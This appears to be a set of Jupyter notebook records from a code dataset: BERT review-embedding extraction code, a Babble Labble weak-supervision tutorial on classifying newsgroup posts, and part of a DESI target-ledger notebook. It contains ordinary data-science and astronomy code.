gpus = tf.config.experimental.list_logical_devices("GPU")
# Select appropriate distribution strategy
if tpu_resolver:
tf.config.experimental_connect_to_cluster(tpu_resolver)
tf.tpu.experimental.initialize_tpu_system(tpu_resolver)
strategy = tf.distribute.experimental.TPUStrategy(tpu_resolver)
print('Running on TPU ', tpu_resolver.cluster_spec().as_dict()['worker'])
elif len(gpus) > 1:
strategy = tf.distribute.MirroredStrategy([gpu.name for gpu in gpus])
print('Running on multiple GPUs ', [gpu.name for gpu in gpus])
elif len(gpus) == 1:
strategy = tf.distribute.get_strategy() # default strategy that works on CPU and single GPU
print('Running on single GPU ', gpus[0].name)
else:
strategy = tf.distribute.get_strategy() # default strategy that works on CPU and single GPU
print('Running on CPU')
print("Number of accelerators: ", strategy.num_replicas_in_sync)
bert_model_name = 'bert-base-uncased'
MAX_LEN = 128
config = BertConfig()
config.output_hidden_states = True # set to True to obtain hidden states
with strategy.scope():
tokenizer = BertTokenizer.from_pretrained(bert_model_name, do_lower_case=True)
user_bert = TFBertModel.from_pretrained(bert_model_name, config=config)
item_bert = TFBertModel.from_pretrained(bert_model_name, config=config)
def last_hidden_state_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens)[0]
item_embedding = item_model(item_tokens)[0]
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
#_embeddings[i] = ((dict(user_embedding=user_embedding,
# item_embedding=item_embedding)), label)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = last_hidden_state_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
def sum_last_four_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
# Sum last four hiddden states
user_embedding = tf.reduce_sum(user_embedding[-4:], axis=0)
item_embedding = tf.reduce_sum(item_embedding[-4:], axis=0)
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = sum_last_four_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_sumlastfour_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_sumlastfour_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
def sum_last_twelve_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
# Sum last twelve hiddden states
user_embedding = tf.reduce_sum(user_embedding[-12:], axis=0)
item_embedding = tf.reduce_sum(item_embedding[-12:], axis=0)
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = sum_last_twelve_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_sumlasttwelve_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_sumlasttwelve_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
def second_to_last_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
# Second-to-last hiddden states
user_embedding = user_embedding[-2]
item_embedding = item_embedding[-2]
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = second_to_last_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_secondtolast_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_secondtolast_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
def first_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
# First embedding
user_embedding = user_embedding[0]
item_embedding = item_embedding[0]
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = first_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_first_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_first_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
def concat_last_four_embedding(samples, tokenizer, user_model, item_model, max_len=128):
def tokenize(reviews):
return tokenizer(list(reviews), padding='max_length', truncation=True, max_length=max_len, return_tensors='tf')
total = len(samples)
_embeddings = np.empty(len(samples), dtype=object)
for i, reviews in enumerate(samples):
user_tokens = tokenize(reviews[3])
item_tokens = tokenize(reviews[4])
reviewerID = reviews[0]
asin = reviews[1]
label = reviews[2]
user_embedding = user_model(user_tokens).hidden_states
item_embedding = item_model(item_tokens).hidden_states
# Concat last four hiddden states
user_embedding = tf.concat(user_embedding[-4:], axis=2)
item_embedding = tf.concat(item_embedding[-4:], axis=2)
user_embedding = tf.stack([user_embedding])
item_embedding = tf.stack([item_embedding])
user_embedding = tf.keras.layers.GlobalAveragePooling2D()(user_embedding)
item_embedding = tf.keras.layers.GlobalAveragePooling2D()(item_embedding)
_embeddings[i] = dict(reviewerID=reviewerID, asin=asin,
user_embedding=user_embedding,
item_embedding=item_embedding,
label=label)
print(f'\rEmbedding... {i+1} of {total} record(s) -- {(i+1)/total*100:.2f}%', end='')
print('\n\tDone!')
return _embeddings
%%time
start = 0
end = 150000
embeddings = concat_last_four_embedding(grouped_reviews[start:end], tokenizer, user_bert, item_bert)
embedding_dir = '../dataset/embedding/'
if not os.path.exists(embedding_dir):
os.makedirs(embedding_dir)
if amazon:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_concatlastfour_',str(start),'-',str(end),'_Movies_and_TV.npy'])
else:
embedding_npy = ''.join([embedding_dir, 'grouped_embedding_concatlastfour_',str(start),'-',str(end),'_yelp.npy'])
if os.path.exists(embedding_npy):
os.remove(embedding_npy)
embedding_store = NpyStore(embedding_npy)
embedding_store.write(embeddings)
| 0.352759 | 0.619212 |
```
# Unzip the data
# Replace PASSWORD with the password to unzip
!unzip -P PASSWORD ../data.zip -d ../
import sys
sys.path.append("..")
from data.preparer import load_news_dataset
from babble import Explanation
from babble import BabbleStream
from babble.Candidate import Candidate
from analyzer import upload_data
from metal.analysis import lf_summary
from metal.analysis import label_coverage
from metal import LabelModel
from metal.tuners import RandomSearchTuner
from babble.utils import ExplanationIO
import pandas as pd
from datetime import datetime
from snorkel.labeling import filter_unlabeled_dataframe
stat_history = pd.DataFrame()
import nltk
nltk.download("punkt")
pd.set_option('display.max_colwidth', -1)
```
## The Data
These texts discuss either gun politics (1) or computer electronics (0).
If you're not sure about the correct label, that's fine -- either make your best guess or just skip the example.
Load the dataset into training, validation, development, and test sets
```
df_train, df_dev, df_valid, df_test, _ = load_news_dataset()
print("{} training examples".format(len(df_train)))
print("{} development examples".format(len(df_dev)))
print("{} validation examples".format(len(df_valid)))
print("{} test examples".format(len(df_test)))
```
Convert the data and labels into a Babble-friendly format
```
dfs = [df_train, df_dev]
dfs[0]['label'] = -1
for df in dfs:
df["id"] = range(len(df))
df["label"] += 1
Cs = [df.apply(lambda x: Candidate(x), axis=1) for df in dfs]
# babble labble uses 1 and 2 for labels, while our data uses 0 and 1
# add 1 to convert
Ys = [df.label.values for df in dfs]
Ys[0] -= 1 # no label (training set) should be set to -1
```
Define the labels for this task.
```
ABSTAIN = 0
ELECTRONICS = 1
GUNS = 2
```
# Babble Tutorial
## News forum classification
### You will work with a subset of the 20 NewsGroup dataset.
The texts shown are from one of two forums:
1. Computer Electronics (Label 1)
2. Gun Politics Forum (Label 2)
Your job is to create a training data set to classify texts as belonging to one of these two forums.
__You will do this by writing natural language explanations of why you would label an example a certain way (1 (ELECTRONICS), 2 (GUNS), or 0 (ABSTAIN or no label)).__
These explanations will be parsed into functions which will be aggregated by Snorkel to create training data from unlabeled examples.
You can evaluate your progress based on the coverage and f1 score of your label model, or by training a logistic regression classifier on the data and evaluating the test result.
```
# Start the timer!
stat_history = stat_history.append({
"time": datetime.now(),
"num_lfs": 0,
"f1": 0.0,
"precision": 0.0,
"recall": 0.0,
"training_label_coverage": 0.0,
"training_label_size": 0.0
}, ignore_index=True)
```
Load the data into a *BabbleStream*: an object that iteratively displays candidates, collects and parses explanations.
```
babbler = BabbleStream(Cs, Ys, balanced=True, shuffled=True, seed=456)
```
Here, you can define aliases (a concise way to refer to a set of terms).
In a little bit you'll see an example of how to use aliases.
```
# aliases are a way to refer to a set of words in a rule.
aliases = {
"unit": ["joules", "volts", "ohms", "MHz"]
}
babbler.add_aliases(aliases)
def prettyprint(candidate):
# just a helper function to print the candidate nicely
print("MENTION ID {}".format(candidate.mention_id))
print()
print(candidate.text)
```
Let's look at an example candidate!
```
# Rerun this cell to get a new example
candidate = babbler.next()
prettyprint(candidate)
```
__Next, we'll learn how to write a labelling function from a natural language explanation of why you chose a label for a given candidate.__
## Create Explanations
Creating explanations generally happens in five steps:
1. View candidates
2. Write explanations
3. Get feedback
4. Update explanations
5. Apply label aggregator
Steps 3-5 are optional; explanations may be submitted without any feedback on their quality. However, in our experience, observing how well explanations are being parsed and what their accuracy/coverage on a dev set are (if available) can quickly lead to simple improvements that yield significantly more useful labeling functions.
Once a few labeling functions have been collected, you can use the label aggregator to identify candidates that are being mislabeled and write additional explanations targeting those failure modes.
Feel free to consult the internet or ask your experiment leader.
*For the real task, you will be asked to write labeling functions as quickly and accurately as possible. You will still be allowed to use the internet in this phase, but not ask your experiment leader. You may refer to this tutorial as needed.*
### Collection
Use `babbler` to show candidates
```
candidate = babbler.next()
prettyprint(candidate)
```
Is it about guns or electronics? What makes you think that? (If you don't know, it's okay to make your best guess or skip an example.)
Run the three examples given below, then parse them, and analyze them.
Then, you can try editing them and writing your own functions!
```
e0 = Explanation(
# name of this rule, for your reference
name='electr...',
# label to assign
label=ELECTRONICS,
# natural language description of why you label the candidate this way
condition='A word in the sentence starts with "electr"',
# candidate is an optional argument, it should be the id of an example labeled by this rule.
# This is a fail-safe: if the rule doesn't apply to the candidate you provide, it will be filtered!
candidate = 5
)
e1 = Explanation(
name = 'politics',
label = GUNS,
condition = 'Any of the words "election", "senator", "democrat", "candidate", or "republican" are in the text',
candidate = 33 # the candidate's mention ID, optional argument
)
e2 = Explanation(
name = 'selfdefense',
label = GUNS,
condition = 'because the word "self" occurs before "defense"'
)
```
Below is an example of an explanation that uses an alias: "unit".
You can define more aliases where the BabbleStream is initialized.
```
e3 = Explanation(
name = "units",
label = ELECTRONICS,
condition = 'A word in the sentence is a unit'
)
e4 = Explanation(
name = "e4",
label = ABSTAIN,
condition = ""
)
```
Babble will parse your explanations into functions, then filter out functions that are duplicates, incorrectly label their given candidate, or assign the same label to all examples.
```
# Add any explanations that you haven't committed yet
explanations = [e0, e1, e2, e3]
parses, filtered = babbler.apply(explanations)
stat_history = stat_history.append({
"time": datetime.now(),
"num_lfs": len(parses),
"num_explanations": len(explanations),
"num_filtered": len(filtered)
}, ignore_index=True)
```
### Analysis
See how your parsed explanations performed
```
try:
dev_analysis = babbler.analyze(parses)
display(dev_analysis)
dev_analysis['time'] = datetime.now()
dev_analysis['eval'] = "dev"
dev_analysis["lf_id"] = dev_analysis.index
stat_history = stat_history.append(dev_analysis, sort=False, ignore_index=True)
except ValueError as e:
print("It seems as though none of your labeling functions were parsed. See the cells above and below for more information.")
print("ERROR:")
print(e)
```
See which explanations were filtered and why
```
babbler.filtered_analysis(filtered)
babbler.commit()
```
### Evaluation
Get feedback on the performance of your explanations
```
Ls = [babbler.get_label_matrix(split) for split in [0,1,2]]
lf_names = [lf.__name__ for lf in babbler.get_lfs()]
lf_summary(Ls[1], Ys[1], lf_names=lf_names)
search_space = {
'n_epochs': [50, 100, 500],
'lr': {'range': [0.01, 0.001], 'scale': 'log'},
'show_plots': False,
}
tuner = RandomSearchTuner(LabelModel, seed=123)
label_aggregator = tuner.search(
search_space,
train_args=[Ls[0]],
X_dev=Ls[1], Y_dev=Ys[1],
max_search=20, verbose=False, metric='f1')
# record statistics over time
pr, re, f1, acc = label_aggregator.score(Ls[1], Ys[1], metric=['precision', 'recall', 'f1', 'accuracy'])
stats = {
"precision": pr,
"recall": re,
"f1": f1,
"accuracy": acc,
"eval": "dev",
"model": "label_aggregator",
"time": datetime.now(),
"training_label_coverage": label_coverage(Ls[0]),
"training_label_size": label_coverage(Ls[0])*len(dfs[0])
}
stat_history = stat_history.append(stats, ignore_index=True)
```
Is one LF performing badly? Use the cell below to inspect some incorrectly labeled examples. You will need to input the LF ID (also called "j")
```
# view some incorrectly labeled examples for a given LF
j = 0
print(lf_names[j])
# set j to match the value of the LF you're interested in
L_dev = Ls[1].todense()
display(df_dev[L_dev[:,j].A1==abs(df_dev["label"]-3)])
```
## Train and Evaluate a Model
We can train a simple bag of words model on these labels, and see test accuracy.
(This step may take a while).
```
L_train = Ls[0].todense()
probs_train = label_aggregator.predict_proba(L=L_train)
mask = (L_train != 0).any(axis=1).A1
df_train_filtered = df_train.iloc[mask]
probs_train_filtered = probs_train[mask]
print("{} out of {} examples used for training data".format(len(df_train_filtered), len(df_train)))
from analyzer import train_model_from_probs
stats = train_model_from_probs(df_train_filtered, probs_train_filtered, df_valid, df_test)
stats["time"] = datetime.now()
stat_history = stat_history.append(stats, ignore_index=True)
```
## FINISHED?
### It's time to save.
When your time is up, please save your explanations and model!
```
# Enter your name (for file naming)
YOUR_NAME = ""
!mkdir babble_tutorial
# save statistics history
stat_history.to_csv("babble_tutorial/statistics_history.csv")
%history -p -o -f babble_tutorial/history.log
!cp babble_tutorial.ipynb babble_tutorial/notebook.ipynb
# save explanations
FILE = "babble_tutorial/explanations.tsv"
from types import SimpleNamespace
exp_io = ExplanationIO()
for exp in explanations:
if exp.candidate is None:
exp.candidate = SimpleNamespace(mention_id = None)
exp_io.write(explanations, FILE)
explanations = exp_io.read(FILE)
# save label model
label_aggregator.save("babble_tutorial/lfmodel.pkl")
# zip and upload the data
import shutil
shutil.make_archive(YOUR_NAME + "_babble_tutorial", 'zip', "babble_tutorial")
assert len(YOUR_NAME) > 0
upload_data(YOUR_NAME + "_babble_tutorial.zip")
```
...And you're done!
## THANK YOU :]
|
github_jupyter
|
# Unzip the data
# Replace PASSWORD with the password to unzip
!unzip -P PASSWORD ../data.zip -d ../
import sys
sys.path.append("..")
from data.preparer import load_news_dataset
from babble import Explanation
from babble import BabbleStream
from babble.Candidate import Candidate
from analyzer import upload_data
from metal.analysis import lf_summary
from metal.analysis import label_coverage
from metal import LabelModel
from metal.tuners import RandomSearchTuner
from babble.utils import ExplanationIO
import pandas as pd
from datetime import datetime
from snorkel.labeling import filter_unlabeled_dataframe
stat_history = pd.DataFrame()
import nltk
nltk.download("punkt")
pd.set_option('display.max_colwidth', -1)
df_train, df_dev, df_valid, df_test, _ = load_news_dataset()
print("{} training examples".format(len(df_train)))
print("{} development examples".format(len(df_dev)))
print("{} validation examples".format(len(df_valid)))
print("{} test examples".format(len(df_test)))
dfs = [df_train, df_dev]
dfs[0]['label'] = -1
for df in dfs:
df["id"] = range(len(df))
df["label"] += 1
Cs = [df.apply(lambda x: Candidate(x), axis=1) for df in dfs]
# babble labble uses 1 and 2 for labels, while our data uses 0 and 1
# add 1 to convert
Ys = [df.label.values for df in dfs]
Ys[0] -= 1 # no label (training set) should be set to -1
ABSTAIN = 0
ELECTRONICS = 1
GUNS = 2
# Start the timer!
stat_history = stat_history.append({
"time": datetime.now(),
"num_lfs": 0,
"f1": 0.0,
"precision": 0.0,
"recall": 0.0,
"training_label_coverage": 0.0,
"training_label_size": 0.0
}, ignore_index=True)
babbler = BabbleStream(Cs, Ys, balanced=True, shuffled=True, seed=456)
# aliases are a way to refer to a set of words in a rule.
aliases = {
"unit": ["joules", "volts", "ohms", "MHz"]
}
babbler.add_aliases(aliases)
def prettyprint(candidate):
# just a helper function to print the candidate nicely
print("MENTION ID {}".format(candidate.mention_id))
print()
print(candidate.text)
# Rerun this cell to get a new example
candidate = babbler.next()
prettyprint(candidate)
candidate = babbler.next()
prettyprint(candidate)
e0 = Explanation(
# name of this rule, for your reference
name='electr...',
# label to assign
label=ELECTRONICS,
# natural language description of why you label the candidate this way
condition='A word in the sentence starts with "electr"',
# candidate is an optional argument, it should be the id of an example labeled by this rule.
# This is a fail-safe: if the rule doesn't apply to the candidate you provide, it will be filtered!
candidate = 5
)
e1 = Explanation(
name = 'politics',
label = GUNS,
condition = 'Any of the words "election", "senator", "democrat", "candidate", or "republican" are in the text',
candidate = 33 # the candidate's mention ID, optional argument
)
e2 = Explanation(
name = 'selfdefense',
label = GUNS,
condition = 'because the word "self" occurs before "defense"'
)
e3 = Explanation(
name = "units",
label = ELECTRONICS,
condition = 'A word in the sentence is a unit'
)
e4 = Explanation(
name = "e4",
label = ABSTAIN,
condition = ""
)
# Add any explanations that you haven't committed yet
explanations = [e0, e1, e2, e3]
parses, filtered = babbler.apply(explanations)
stat_history = stat_history.append({
"time": datetime.now(),
"num_lfs": len(parses),
"num_explanations": len(explanations),
"num_filtered": len(filtered)
}, ignore_index=True)
try:
dev_analysis = babbler.analyze(parses)
display(dev_analysis)
dev_analysis['time'] = datetime.now()
dev_analysis['eval'] = "dev"
dev_analysis["lf_id"] = dev_analysis.index
stat_history = stat_history.append(dev_analysis, sort=False, ignore_index=True)
except ValueError as e:
print("It seems as though none of your labeling functions were parsed. See the cells above and below for more information.")
print("ERROR:")
print(e)
babbler.filtered_analysis(filtered)
babbler.commit()
Ls = [babbler.get_label_matrix(split) for split in [0,1,2]]
lf_names = [lf.__name__ for lf in babbler.get_lfs()]
lf_summary(Ls[1], Ys[1], lf_names=lf_names)
search_space = {
'n_epochs': [50, 100, 500],
'lr': {'range': [0.01, 0.001], 'scale': 'log'},
'show_plots': False,
}
tuner = RandomSearchTuner(LabelModel, seed=123)
label_aggregator = tuner.search(
search_space,
train_args=[Ls[0]],
X_dev=Ls[1], Y_dev=Ys[1],
max_search=20, verbose=False, metric='f1')
# record statistics over time
pr, re, f1, acc = label_aggregator.score(Ls[1], Ys[1], metric=['precision', 'recall', 'f1', 'accuracy'])
stats = {
"precision": pr,
"recall": re,
"f1": f1,
"accuracy": acc,
"eval": "dev",
"model": "label_aggregator",
"time": datetime.now(),
"training_label_coverage": label_coverage(Ls[0]),
"training_label_size": label_coverage(Ls[0])*len(dfs[0])
}
stat_history = stat_history.append(stats, ignore_index=True)
# view some incorrectly labeled examples for a given LF
j = 0
print(lf_names[j])
# set j to match the value of the LF you're interested in
L_dev = Ls[1].todense()
display(df_dev[L_dev[:,j].A1==abs(df_dev["label"]-3)])
L_train = Ls[0].todense()
probs_train = label_aggregator.predict_proba(L=L_train)
mask = (L_train != 0).any(axis=1).A1
df_train_filtered = df_train.iloc[mask]
probs_train_filtered = probs_train[mask]
print("{} out of {} examples used for training data".format(len(df_train_filtered), len(df_train)))
from analyzer import train_model_from_probs
stats = train_model_from_probs(df_train_filtered, probs_train_filtered, df_valid, df_test)
stats["time"] = datetime.now()
stat_history = stat_history.append(stats, ignore_index=True)
# Enter your name (for file naming)
YOUR_NAME = ""
!mkdir babble_tutorial
# save statistics history
stat_history.to_csv("babble_tutorial/statistics_history.csv")
%history -p -o -f babble_tutorial/history.log
!cp babble_tutorial.ipynb babble_tutorial/notebook.ipynb
# save explanations
FILE = "babble_tutorial/explanations.tsv"
from types import SimpleNamespace
exp_io = ExplanationIO()
for exp in explanations:
if exp.candidate is None:
exp.candidate = SimpleNamespace(mention_id = None)
exp_io.write(explanations, FILE)
explanations = exp_io.read(FILE)
# save label model
label_aggregator.save("babble_tutorial/lfmodel.pkl")
# zip and upload the data
import shutil
shutil.make_archive(YOUR_NAME + "_babble_tutorial", 'zip', "babble_tutorial")
assert len(YOUR_NAME) > 0
upload_data(YOUR_NAME + "_babble_tutorial.zip")
| 0.366476 | 0.82994 |
```
import glob
import numpy as np
from astropy.table import Table
from desitarget.io import read_mtl_ledger
from desitarget.mtl import make_mtl, inflate_ledger
```
# Original documentation
https://github.com/desihub/desitarget/pull/635
Grab a starting targets file.
```
# Standard target files, hp 39 only.
targets = Table.read('/project/projectdirs/desi/target/catalogs/dr8/0.39.0/targets/sv/resolve//dark/sv1-targets-dr8-hp-39.fits')
targets
```
Call to create a ledger from the targets:
```
# ! make_ledger('/project/projectdirs/desi/target/catalogs/dr8/0.39.0/targets/sv/resolve/dark/', '/global/cscratch1/sd/adamyers/egledger/mtl/sv1/dark/', obscon="DARK", numproc=1)
```
Retrieve a pre-created version, or run above, which ones are available?
```
ledgers = glob.glob('/global/cscratch1/sd/adamyers/egledger/mtl/sv1/dark/*.ecsv')
ledgers[:10]
# Only healpixels with targets are processed.
hpxls = np.array([x.split('-')[-1].replace('.ecsv', '') for x in ledgers]).astype(np.int)
hpxls = np.unique(hpxls)
hpxls
# HEALPixel-split ledger files generated from the standard target files.
# A new data model that includes a state for each target, a timestamp for when a target's state was updated,
# and the desitarget code version that was used to update the target's state.
ledger = read_mtl_ledger('/global/cscratch1/sd/adamyers/egledger/mtl/sv1/dark/sv1mtl-dark-hp-8400.ecsv')
ledger = Table(ledger)
ledger
uids, cnts = np.unique(ledger['TARGETID'], return_counts=True)
# Initialised ledger.
np.unique(cnts)
# Does this match up with fiberassign input arguments? Did this rundate change? Now YYYY-MM-DD.
ledger['TIMESTAMP']
ledger['VERSION']
```
Create a (now default slimmed) mtl from the ledger files:
```
# Columns are now automatically trimmed to a minimum necessary set in desitarget.mtl.make_mtl()
mtl = make_mtl(ledger, obscon='DARK')
# TIMESTAMP -> LAST_TIMESTAMP?
mtl
```
Each TARGETID only appears once in the mtl, with the latest state:
```
uids, cnts = np.unique(mtl['TARGETID'], return_counts=True)
cnts.max()
imtl = inflate_ledger(mtl, '/project/projectdirs/desi/target/catalogs/dr8/0.39.0/targets/sv/resolve//dark/', columns=None, header=False, strictcols=False)
len(imtl.dtype.names), len(mtl.dtype.names)
```
New columns in inflated ledger:
```
[x for x in list(imtl.dtype.names) if x not in list(mtl.dtype.names)]
ledger_updates = glob.glob('/global/cscratch1/sd/adamyers/egupdates/mtl/sv1/dark/*.ecsv')
ledger_updates[:10]
update = read_mtl_ledger('/global/cscratch1/sd/adamyers/egupdates/mtl/sv1/dark/sv1mtl-dark-hp-8400.ecsv')
update = Table(update)
update
uids, cnts = np.unique(update['TARGETID'], return_counts=True)
np.unique(cnts)
np.unique(update['NUMOBS'])
```
# Done.
|
github_jupyter
|
import glob
import numpy as np
from astropy.table import Table
from desitarget.io import read_mtl_ledger
from desitarget.mtl import make_mtl, inflate_ledger
# Standard target files, hp 39 only.
targets = Table.read('/project/projectdirs/desi/target/catalogs/dr8/0.39.0/targets/sv/resolve//dark/sv1-targets-dr8-hp-39.fits')
targets
# ! make_ledger('/project/projectdirs/desi/target/catalogs/dr8/0.39.0/targets/sv/resolve/dark/', '/global/cscratch1/sd/adamyers/egledger/mtl/sv1/dark/', obscon="DARK", numproc=1)
ledgers = glob.glob('/global/cscratch1/sd/adamyers/egledger/mtl/sv1/dark/*.ecsv')
ledgers[:10]
# Only healpixels with targets are processed.
hpxls = np.array([x.split('-')[-1].replace('.ecsv', '') for x in ledgers]).astype(np.int)
hpxls = np.unique(hpxls)
hpxls
# HEALPixel-split ledger files generated from the standard target files.
# A new data model that includes a state for each target, a timestamp for when a target's state was updated,
# and the desitarget code version that was used to update the target's state.
ledger = read_mtl_ledger('/global/cscratch1/sd/adamyers/egledger/mtl/sv1/dark/sv1mtl-dark-hp-8400.ecsv')
ledger = Table(ledger)
ledger
uids, cnts = np.unique(ledger['TARGETID'], return_counts=True)
# Initialised ledger.
np.unique(cnts)
# Does this match up with fiberassign input arguments? Did this rundate change? Now YYYY-MM-DD.
ledger['TIMESTAMP']
ledger['VERSION']
# Columns are now automatically trimmed to a minimum necessary set in desitarget.mtl.make_mtl()
mtl = make_mtl(ledger, obscon='DARK')
# TIMESTAMP -> LAST_TIMESTAMP?
mtl
uids, cnts = np.unique(mtl['TARGETID'], return_counts=True)
cnts.max()
imtl = inflate_ledger(mtl, '/project/projectdirs/desi/target/catalogs/dr8/0.39.0/targets/sv/resolve//dark/', columns=None, header=False, strictcols=False)
len(imtl.dtype.names), len(mtl.dtype.names)
[x for x in list(imtl.dtype.names) if x not in list(mtl.dtype.names)]
ledger_updates = glob.glob('/global/cscratch1/sd/adamyers/egupdates/mtl/sv1/dark/*.ecsv')
ledger_updates[:10]
